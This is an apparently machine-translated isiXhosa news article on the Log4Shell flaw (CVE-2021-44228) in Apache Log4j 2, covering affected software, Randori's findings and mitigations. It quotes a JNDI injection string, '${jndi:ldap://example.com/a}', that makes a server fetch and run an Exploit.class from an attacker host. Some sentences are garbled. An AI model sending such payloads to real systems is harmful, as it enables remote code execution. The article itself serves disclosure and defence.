I-Log4Shell, ubuthathaka obubalulekileyo kwi-Apache Log4j 2 echaphazela iiprojekthi ezininzi zeJava

Kutshanje sUkhuphe iindaba zokuba ubuthathaka obubalulekileyo ichongiwe kwi-Apache Log4j 2, ebonakaliswe njengesakhelo esidumileyo sokulungelelanisa irejista kwizicelo zeJava, ukuvumela ikhowudi engafanelekanga ukuba iqhutywe xa ixabiso elifomathiweyo libhalwa kwirejista kwifomathi "{jndi: URL}".

Ukuba sesichengeni Kuyaphawuleka kuba uhlaselo lunokuqhutywa kwizicelo zeJava ukubaBabhala amaxabiso afunyenwe kwimithombo yangaphandle, umzekelo ngokubonisa amaxabiso anengxaki kwimiyalezo yempazamo.

Kuyaqapheleka ukuba phantse zonke iiprojekthi ezisebenzisa izikhokelo ezinje ngeApache Struts, Apache Solr, Apache Druid okanye Apache Flink ziyachaphazeleka, kubandakanya iSteam, iApple iCloud, abathengi beMinecraft kunye neeseva.

Ubuthathaka kulindeleke ukuba bukhokhelele kuhlaselo olukhulu kwizicelo zeshishini, ukuphinda imbali yobuthathaka obubalulekileyo kwisakhelo, i-Apache Struts, eluqikelelo olurhabaxa olusetyenziswa kwi-65% yezicelo zewebhu ze-Fortune 100. Uluhlu lwezicelo zewebhu zenkampani. kubandakanywa iinzame esele zirekhodiwe zokuskena uthungelwano lweenkqubo ezisesichengeni.

Ubuthathaka buvumela ukuphunyezwa okude kwekhowudi engavunywanga. I-Log4j 2 yimithombo evulekileyo yelayibrari yelog yeJava ephuhliswe yiApache Foundation. I-Log4j 2 isetyenziswa ngokubanzi kwizicelo ezininzi kwaye ikhona, njengokuxhomekeka, kwiinkonzo ezininzi. Oku kubandakanya usetyenziso lweshishini kunye neenkonzo ezininzi zamafu.

Iqela lokuhlaselwa kweRandori liye laphuhlisa ukuxhaphazwa okusebenzayo kwaye liye lakwazi ukusebenzisa ngempumelelo obu buthathaka kwiindawo zabathengi njengenxalenye yeqonga lethu lokhuseleko elihlaselayo. 

Ubuthathaka bunokufikelelwa ngobuninzi beendlela ezithe ngqo kwisicelo. Ngokwenene, nayiphi na imeko evumela uqhagamshelo olukude ukubonelela ngedatha engenamkhethe ukuba isicelo esisebenzisa ilayibrari ye-Log4j sibhala kwiifayile zokungena sisengozini yokuxhatshazwa. Obu buthathaka bunokwenzeka ukuba busetyenziswe endle kwaye bunokuchaphazela amawaka emibutho. Obu buthathaka bumele umngcipheko wokwenyani obalulekileyo kwiinkqubo ezichaphazelekayo.

Ingxaki yongezwa yinyaniso yokuba i-exploit esebenzayo sele ishicilelwe, umz.Kodwa ukulungiswa kwamasebe azinzileyo akukaveliswa. Isichongi se-CVE asikabelwa. Isisombululo sifakwe kuphela kwisebe lovavanyo log4j-2.15.0-rc1. Njengomsebenzi wokuvala ubuthathaka, kuyacetyiswa ukuba usete iparamitha Log4j2.formatMsgNoLookups ukuba yinyani.

Ingxaki kwakungenxa yokuba i-Log4j 2 ixhasa ukuphathwa kweemaski ezikhethekileyo «{}» kwimigca yelog, apho ku Imibuzo ye-JNDI inokuqhutywa (Igama leJava kunye nesiNxulumanisi soLawulo).

Ekuhlalutyeni i-CVE-2021-44228, uRandori umisele oku kulandelayo:

Ufakelo oluhlala lukhona lwesoftware yoshishino olusetyenziswa ngokubanzi lusemngciphekweni.
Ukuba sesichengeni kungasetyenziswa ngokuthembekileyo kwaye ngaphandle kokuqinisekisa.
Ukuba sesichengeni kuchaphazela iinguqulelo ezininzi zeLog4j 2.
Ubuthathaka buvumela ukwenziwa kwekhowudi ekude xa umsebenzisi eqhuba usetyenziso esebenzisa ithala leencwadi.

Uhlaselo lubilisa ekugqithiseni umtya ngokufaka endaweni "$ {jndi: ldap: //example.com/a}", ukuqhubekekisa iLog4j 2 iyakuthumela isicelo seLDAP sendlela eya kwiklasi yeJava kumncedisi we attacker.com . Indlela ebuyiswe ngumncedisi womhlaseli (umzekelo, http://example.com/Exploit.class) iya kulayishwa kwaye isetyenziswe kumxholo wenkqubo yangoku, ivumela umhlaseli ukuba afezekise ukuphunyezwa kwekhowudi engafanelekanga kwinkqubo enamalungelo. yesicelo sangoku.

Okokugqibela, kuyakhankanywa ukuba ukuba kufunyenwe izinto ezingaqhelekanga, kucetyiswa ukuba ucinge ukuba esi sisiganeko esisebenzayo, ukuba sithotyelwe, kwaye uphendule ngokufanelekileyo. Ukunyuselwa kwiinguqulelo ezifakwe kwiLog4j 2 okanye izicelo ezichaphazelekayo ziya kuphelisa obu buthathaka. I-Randori icebisa nawuphi na umbutho ocinga ukuba unokuchaphazeleka ngokukhawuleza uphuculo kwinguqulelo ekhutshiweyo.

Kuhlaziyo lwamva nje lweqela le-Apache Log4j, cebisa ukuba imibutho yenze oku kulandelayo

  • Hlaziya kwiLog4j 2.15.0
  • Kwabo bangenako ukunyusela ku-2.15.0: Kwiinguqulelo> = 2.10, obu buthathaka bunokuthotywa ngokuseta ipropathi yenkqubo ye-log4j2.formatMsgNoLookup okanye i-LOG4J_FORMAT_MSG_NO_LOOKUPS eguquguqukayo yokusingqongileyo ukuya kwinyani.
  • Kwiinguqulelo ze-2,0-beta9 ukuya kwi-2.10.0, ukunciphisa kukususa iklasi ye-JndiLookup kwi-classpath: zip -q -d log4j-core - *.

Umthombo: https://www.lunasec.io/


Umxholo wenqaku uyabambelela kwimigaqo yethu imigaqo yokuziphatha yokuhlela. Ukuxela impazamo cofa apha.

Yiba ngowokuqala ukuphawula

Shiya uluvo lwakho

Idilesi yakho ye email aziyi kupapashwa.

*

*

  1. Uxanduva lwedatha: UMiguel Ángel Gatón
  2. Injongo yedatha: Ulawulo lwe-SPAM, ulawulo lwezimvo.
  3. Umthetho: Imvume yakho
  4. Unxibelelwano lwedatha: Idatha ayizukuhanjiswa kubantu besithathu ngaphandle koxanduva lomthetho.
  5. Ukugcinwa kweenkcukacha
  6. Amalungelo: Ngalo naliphi na ixesha unganciphisa, uphinde uphinde ucime ulwazi lwakho.